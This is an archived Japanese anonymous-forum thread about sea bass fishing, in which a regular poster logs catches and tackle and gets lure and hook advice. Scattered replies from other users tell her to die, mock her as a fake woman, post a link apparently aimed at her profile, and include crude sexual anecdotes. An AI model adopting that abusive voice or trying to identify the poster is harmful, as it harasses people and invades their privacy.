167 : ◆SKmxD2MzBo :2006/12/31(日) 14:12:02 O
>>166さん
チヌとかキビレって良く釣れるし、良く泳いでるの見えますょ。
多分いっぱいいるんだと思います。チヌホッパーにも良く追っかけてきますょv(^-^)v
チヌ釣れるポイントも沢山あるけど、シーバスの方が難しいし、なかなか釣れません(T^T)

それではそろそろ…皆さん良いお年を(*^-^)b

168 :名無し三平:2007/01/03(水) 18:22:26 0
おっ!久しぶりに覗いたら美紀がいるじゃん!
あけおめ、今年もよろしこですъ( ゚ー^)

粘着荒らしにめげずにまた出てきてね



169 : ◆SKmxD2MzBo :2007/01/04(木) 09:51:54 O
>>168さん、皆さん、明けましておめでとうございます(*^-^)b
昨年は大変お世話になりました(^_^)

今年もシーバス頑張りますょ〜v(^-^)v
さて、今から釣り初めというか、ドライブがてら港巡りをしてきます。釣れるといいなぁ(o≧∇≦)o

170 : ◆SKmxD2MzBo :2007/01/04(木) 15:09:52 O
やっぱり釣れない(T^T)
週末出直します(*^-^)b

171 :名無し三平:2007/01/04(木) 16:08:13 0
↑↑↑
好かれてる率20%
嫌われてる率70%


172 :名無し三平:2007/01/04(木) 16:14:42 O
オレ 好きかもしんねェ
(*´д`*)

173 :名無し三平:2007/01/04(木) 20:38:06 0
中古嫁は汚い

174 :名無し三平:2007/01/04(木) 21:26:45 0
釣り好きの彼女と別れた
もっと海外ぐらいまでロケーション良いところ
つれていってあげればよかった
皆さん 良い釣りを!

175 :名無し三平:2007/01/05(金) 00:19:08 0
>>170
そろそろ死ねよ

176 :名無し三平:2007/01/05(金) 00:43:02 0
>>175
お前はそれしか言えない認知症か?
病院に逝って、脳のスキャンニングかけてもらった方がいいんじゃね?

177 :名無し三平:2007/01/05(金) 03:33:19 0
年末に呼んだデリヘル嬢、なんと47歳、俺より9つ年上。

ココ、昼間のフリーだと割引があるから、たまに利用するけど、
俺の風俗歴の中で過去最高齢。
その日の出勤嬢をサイトで確認して、地雷はいないなと思っていたら、
全員の出勤が載ってる訳じゃないみたい。

でも、どう見ても俺と同じくらいの歳にしか見えなかったし、
スタイルも愛想もいい嬢でした。
頭髪、陰毛にも、白髪がある嬢に相手してもらったのも初体験。

178 :名無し三平:2007/01/05(金) 03:34:44 0
長文考えている割には句読点ウンコ盛りで自作自演だね>>177 ↑↑
自作自演馬鹿叩き祭り開催中★!?・・・。。。www、。←句読点他等、語尾にテンコ盛り付けて書き込むのでご注意
 ┌───────┐ ▲自作自演馬鹿がよく使う表記▲【一部紹介】
 | | | ̄ ̄ ̄ ̄ ̄ ̄| | ○○か?、けど、○○だけど、だが、ニダ 、かな?ある?、
 | | | |三|三|三|  /  ̄ ̄ ̄ \ sage進行で宜しく。いやでつ、日本語でおk、org
 | | | |=|=|=| /         ヽ ルアホ、ツインパ、だお^^、ククク、チョソ、ほしい ok。おk
 | | | |三|三|三| |            | ないし。ないな。よくある。だな。(´・ω・`)(笑)
 | | |____  !           ! ですか?、くない?せんか?エロイ人 るし。 ○○クオリティー     
 └──┬┬─  \        /    
      ┘└   _━━━━━l    < 今日も高活性で自作自演してやがる これは叩かねば
   \ ̄ ̄ ̄ ○             i
      ̄ ̄ ̄   ̄|         |


179 :名無し三平:2007/01/05(金) 03:55:10 O
釣りずきニューハーフだよっ
寒いから最近釣りにいってないけど、2月中旬から落ちカレイ&のっこみ黒だいガンバる予定
だれか一緒に行こうよ。

180 :名無し三平:2007/01/05(金) 04:03:48 0
ニューハーフさんですか
魚釣りより興味しんしん丸ですな!
しかし、おちカレイ?クロダイ?
何処ですかね?しぶいんですけど!


181 : ◆SKmxD2MzBo :2007/01/05(金) 22:38:28 O
今日は仕事初めでした。しかぁ〜し…初日から大残業!!会社を出たら8時半でした。
一階のお姉さま方は5時半に一斉退社…私とえりちんは請求書作成でてんてこまい…
うぅ〜ん…営業マンの皆さんいい加減におしっ!!って言いたいけど…みんなも残業なんだよね!!社長、みんな必死なんですよぉ〜一階の人達以外は…

愚痴はさておき、思う事をつれづれと書き込みます(*^-^)b

<オーシャングリップ>
実はシーバス以外の魚って触り辛かったんです、怖くて。ルアー外すのも大変だったし。
オーシャングリップの赤色が雑誌で見てからずっと欲しかったけど、何処にも売ってませんでした。
北九州の親戚の家に行った時に、近くの大きなショップにお父さん誘ってルアー買いに行った時に偶然赤を見つけて、ちょっと早いクリスマスプレゼントって事にして、おねだりして買って貰いました。
使ってみると凄いですね。フッコ、太刀魚、ソイ、キビレと使いましたが、思ったより軽くて外れないし重さも測れるし凄く便利なんです。
でも買ってからシーバス釣れてないのが悲しい…まだフッコクラスだけ(T^T)
早くシーバス釣りたいな(*^-^)b

182 :名無し三平:2007/01/05(金) 22:51:14 0
>>181
日記になってるから、別スレ作るなり
自分でHPなりブログ立ち上げて、そこでやりなよ。

183 :名無し三平:2007/01/05(金) 23:57:48 O
>>181
だったら死ねばいいと思うよ

184 : ◆SKmxD2MzBo :2007/01/06(土) 21:13:35 O
今日もつれづれと書き込みます。

<釣れるルアー>
釣れるルアーって何だろって、釣れない時期になると考えます。
今まで釣れたルアーの中から、冬場でも釣れたルアーで考えてみました。
私の場合は、まずはマールアミーゴが一番かなぁ…って思います。2色持ってて、チャートは夜用、紺×シルバーは昼用です。
重いから結構飛ぶし、ルアーの中では安いほうだし結構売ってるから安心して使える気がします。
去年は川で結構根掛かりしてロストしちゃいました。今まで80p超えたの3匹だけど、その内2匹はマールアミーゴです。
去年の冬も釣れなかったけど、マールアミーゴでたまに釣れて、釣れない時はマールアミーゴばっかりでした。
今でも一番使うルアーです(*^-^)b

185 :名無し三平:2007/01/06(土) 21:17:09 0
ほら、とっとと言いたい事言え 183

186 :名無し三平:2007/01/06(土) 21:26:39 0
>>184
80cmオーバー3本も釣ってたなんて知らんかった
やるな!おぬし!

187 :名無し三平:2007/01/07(日) 09:09:49 0
>>184
読みづらい文章ですね

188 : ◆SKmxD2MzBo :2007/01/07(日) 22:08:07 O
<レンジバイブ>
レンジバイブもシーバスよく釣れるルアーですよね。すごく気に入ってて、いつも使ってます。
レンジバイブ使う理由は、持ってるルアーの中で一番キャストしやすいからです。一番飛距離が出るから一番好きです。マールアミーゴはちょっと重すぎかなって…
マールアミーゴと同じバイブ系ですけど、使い分けは、マールアミーゴの方が重いから深い所って感じです。
レンジバイブは真ん中位の深さって感じで使ってます。マールアミーゴはシーバス以外にソイなんかが夜だと良く釣れます。
レンジバイブは名前も知らない見た事ない魚が良く釣れます。なんか気持ち悪いヌルヌルした魚が多いですね。
あと、マールアミーゴは川でもシーバス釣れるけど、レンジバイブで川でシーバス釣れた事ないんです。どうしてかなぁ?だから港専用です。
私が持ってるレンジバイブは夜用のパールと昼用の赤金の2色です。バイブ系は手元に動きが伝わって来るから、使ってて楽しいですよね(*^-^)b

189 :名無し三平:2007/01/07(日) 23:18:03 0
>>188
クルクルやワンベイトのようなブレード系は使わんのかね?

190 :178:2007/01/08(月) 04:45:39 0
長文考えている割には句読点ウンコ盛りで自作自演だね>>188 ↑↑
自作自演馬鹿叩き祭り開催中★!?・・・。。。www、。←句読点他等、語尾にテンコ盛り付けて書き込むのでご注意
 ┌───────┐ ▲自作自演馬鹿がよく使う表記▲【一部紹介】
 | | | ̄ ̄ ̄ ̄ ̄ ̄| | ○○か?、けど、○○だけど、だが、ニダ 、かな?ある?、
 | | | |三|三|三|  /  ̄ ̄ ̄ \ sage進行で宜しく。いやでつ、日本語でおk、org
 | | | |=|=|=| /         ヽ ルアホ、ツインパ、だお^^、ククク、チョソ、ほしい ok。おk
 | | | |三|三|三| |            | ないし。ないな。よくある。だな。(´・ω・`)(笑)
 | | |____  !           ! ですか?、くない?せんか?エロイ人 るし。 ○○クオリティー     
 └──┬┬─  \        /    
      ┘└   _━━━━━l    < 今日も高活性で自作自演してやがる これは叩かねば
   \ ̄ ̄ ̄ ○             i
      ̄ ̄ ̄   ̄|         |


191 :名無し三平:2007/01/08(月) 05:06:52 0
久しぶりに実家に帰った
ドエットのキャミを履いた妹が乳を出して寝てた
起こして注意したらドエットズリ下ろして「おっぱいミサイル!」と叫んだ
負けじと「ならばチンコロケット!」とパンツ脱いで叫んだ
そこに妹の旦那が来て「負けませんよ、タマタマ機雷!」とやはりパンツ脱いで叫んだ
そこに母が来て俺ら三人をワカメの付いたおたまで手加減無しに殴った
すごく痛かった
我ら、平均年齢25歳トリオ
向かうところほぼ敵無しだ

192 : ◆SKmxD2MzBo :2007/01/08(月) 11:32:33 O
>>188さん、ブレード系も大好きですょ。
クルクルをずっと使ってました。湾ベイトは使った事ないです。バイトはルアーの中で一番多い気がします。
クルクルは良く釣れるけど、私は下手だから、バイト合わせが難しいって話しを会社でしてました。
そしたら会社の人が、博多に出張した時に、ベイスルーってブレード系のルアーを買って来てくれました。背中に大きな針が付いてるから、フック刺さりやすいって事でした。
最初に使った時に、いきなり50pクラスが2匹港で釣れてからお気に入りです。クルクルはあんまり使わなくなっちゃったけど…ベイスルーは下のフック外してます。そうしたら根掛かりしないから。
ブレード系が一番アピールして釣れるルアーなのかなぁって思います(*^-^)b

193 :名無し三平:2007/01/09(火) 02:18:52 O
>>192
もまえ研究熱心だな
発想が男だよ
釣りに情熱注ぐ前に男作れ
男と釣りしてりゃ釣れなくても楽しいぞ

194 :名無し三平:2007/01/09(火) 08:07:08 O
>>192
ブレード系はバイト数は多いけど、バラシも多いよね。
フックはオーナーのカルティバがいいよ

195 : ◆SKmxD2MzBo :2007/01/09(火) 22:16:24 O
>>193
( ̄▽ ̄)V 頑張りまぁす

196 : ◆SKmxD2MzBo :2007/01/09(火) 22:25:26 O
>>194さん、ありがとうございます。
ブレード系は、釣れたって思ってロッドで合わせてリール巻こうとした瞬間にバレるとか、釣れてリール巻いてる途中でバレる事が多かったです。
きっとちゃんと掛かってなかったんだと思います。クルクルは針が小さいから、薦めてくださったカルティバの少し大きめの針に変えてみますね、アドバイスありがとうございます(*^-^)b

197 :名無し三平:2007/01/10(水) 22:50:22 O
カルティバフックはST46の#5あたりが良いよ

198 : ◆SKmxD2MzBo :2007/01/11(木) 22:14:32 O
>>197さん、アドバイスありがとうございます。今日、帰りにショップによってフック買いました。
5のサイズがなくて4と6しかなかったから、迷ったけど4買いました。いま取り付け終わりました。なんだか釣れる予感がします。ありがとうございました(*^-^)b

199 :名無し三平:2007/01/12(金) 20:13:42 O
井上和香だいすき

200 :名無し三平:2007/01/12(金) 23:32:29 0
なんかウザ

201 : ◆SKmxD2MzBo :2007/01/13(土) 10:51:07 O
今日は朝7時から今年2度目のシーバス釣りをしました。
港2ケ所で全くバイト無し、仕方ないからチヌルアーをしててMリグ1個ロスト(T^T)
チヌが良く釣れる場所に行ってチヌホッパーでバイト無し、予備のMリグでしてたら、いきなりグゥ〜っと!!
今年初めての1匹は32pのキビレちゃんでした(*^-^)b

<ロッド>
シーホークエクストリーム84L
<リール>
カルディアKIX2500
<ライン>
PE1号
<リーダー>
ナイロン20lb
<ルアー>
CD−7 Mリグ
<釣果>
キビレ 32p

202 :名無し三平:2007/01/14(日) 12:41:22 O
流石九州ですな。
こっちはボートシーバスが良く釣れてる。

203 : ◆SKmxD2MzBo :2007/01/14(日) 21:57:04 O
今日は感動というか感激した1日でしたv(^-^)v
昼間は港でしたけど、いつもの様にボウズでした。夕方会社の人からメールがあって、全然釣れないって返事したら、一緒にシーバスするかって話しになって約束しました。
夕方5時半に待ち合わせして6時から1時間しました。場所は河川の下流でシャロー、橋の下付近です。私は初めてそこでしました。
シャローだしトップで釣れるからミノー使えって言われ、最初コモモカウンター125SFのチャートバックを使いました。
そしたら10分位の間で2匹釣れました。42pと48pです。
とにかくデッドスローでただ巻きしろって言われて、そればかりしてました。
釣れたのはすぐ近くでした。きっと追っかけて来たんでしょうね。
それからTKLM12のチャートバックに変えてしたら、また2匹釣れました。34pと43pでした。やっぱりただ巻きでデッドスローでしました。
それからサラナ125Fのチャートバックでしました。キャストしてリール巻き初めたら、いきなりググゥ〜ってロッドが曲がって、エラ洗いだけ気をつけてロッドを横に寝かせて、とにかく必死にリール巻いてって感じでした。

204 : ◆SKmxD2MzBo :2007/01/14(日) 22:11:00 O
なんとか引き上げて測ってみたら、78pありました。あと2pで80pだったけど大満足でしたょv(^-^)v
ちなみに先輩は3匹釣って、私と違って全部60オーバーだったみたい。でも私の78pが一番大きかったんですょ〜( ̄▽ ̄)V
釣れたのは全て先輩のおかげです。釣れる場所に連れてってくれたんで大感謝ですo(≧∇≦o)(o≧∇≦)o
今までは、去年の秋に1日3匹港で釣れたのが最高記録だったけど、初めて1日5匹釣れました。しかも苦手なシャローの川で冬なのに。
今年初めてのシーバスが釣れて、本当に最高の1日でした(*^-^)b

<ロッド>
ブランジーノ95ML
<リール>
セルテート2500
<ライン>
PE1号
<リーダー>
ナイロン20lb
<ルアー>
コモモカウンター125SFチャートバック
TKLM12チャートバック
サラナ125Fチャートバック

205 :名無し三平:2007/01/14(日) 22:47:13 0
>>204
PE1号使うなんてプロみたいなタクールだなw

しかもPE1号で78センチとは畏れいったww


206 :名無し三平:2007/01/14(日) 22:50:41 O
まじかよ
俺は今年まだ釣れてねえってのに・・・
とりあえずオメデトさん

207 :名無し三平:2007/01/14(日) 23:30:48 0
この時期シャローで5本...。しかも78cm...。先輩は全部60cmオーバー....。
俺も九州だけ今はオフシーズン...。どこの川だ?

208 :名無し三平:2007/01/14(日) 23:52:39 O
大分って言ってた気ガス

209 :名無し三平:2007/01/15(月) 00:27:29 O
オカマ?ニューハーフ?

210 :名無し三平:2007/01/15(月) 20:10:41 O
ネカマっす

211 :名無し三平:2007/01/15(月) 20:24:00 0
ウソ臭い ネタとしても面白くない

212 :名無し三平:2007/01/15(月) 20:32:12 O
ネカマ

213 :名無し三平:2007/01/15(月) 20:37:12 O
氏ね

214 : ◆SKmxD2MzBo :2007/01/15(月) 23:12:11 O
本当に普通に釣れたんですょ〜(o≧∇≦)oo(≧∇≦o)
川が苦手っていうか、ミノーが苦手だったけど、何か自信つきました。苦手意識克服したんだょ〜(*^-^)b

215 :名無し三平:2007/01/17(水) 23:16:30 O
>>214
そんなに苦手だたのか?( ̄○ ̄;)
つーか、ミノーの方が釣り易いと思うが

216 : ◆SKmxD2MzBo :2007/01/18(木) 22:25:16 O
>>215さん、こんばんはo(^-^)o
ミノーはバイブに比べて軽いから、飛距離出なくて苦手でした。
川だと海より浅いから、釣れない気がしてました。
実は今夜も、会社の人達と3人で川でしたんです。私は2匹釣れました。40pと44pでルアーはTKLM12です。先輩達は3匹と2匹でした。
その後、帰り道に港で一人で30分したけど、トップでもボトムでもバイトもありませんでした。
やっぱり川の方が釣れるみたい。でも時期とかあるから、まだわからないけど(*^-^)b

217 :名無し三平:2007/01/19(金) 04:31:33 O
これはどうよ…?

http://www.google.co.jp/gwt/n?u=http%3A%2F%2Fplaza.rakuten.co.jp%2Fistyle%2Fprofile%2F&hl=ja&mrestrict=chtml&q=%E3%82%B5%E3%83%90%E3%83%AB&source=m&output=chtml&site=search

218 :名無し三平:2007/01/19(金) 09:07:11 O
ネカマですか?

219 :名無し三平:2007/01/19(金) 21:49:51 0
すごい漁スレ

220 :名無し三平:2007/01/20(土) 00:25:15 O
ミキタン ハァハァ

221 : ◆SKmxD2MzBo :2007/01/20(土) 09:50:22 O
昨夜は一人でシーバス釣りに行ってきました。
川では釣れてるけど、港でまだシーバス釣れてないから、絶対釣ってやるんだぁ〜って。でも釣れませんでした(T^T)
一度もバイトがありませんでした(ToT)
それから、いつもの川に行ってしてたら、なんとか2匹釣れました。45pと47pです。今年通算9匹です、やっぱり釣れると楽しいですよね。
もう少ししたら、シーバス釣りに行きます。昼間はまだ釣れてないから絶対釣ります。

<ロッド>
ブランジーノ95ML
<リール>
セルテート2500
<ルアー>
TKLM12
<釣果>
フッコちゃん45pと47pの2匹

51 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)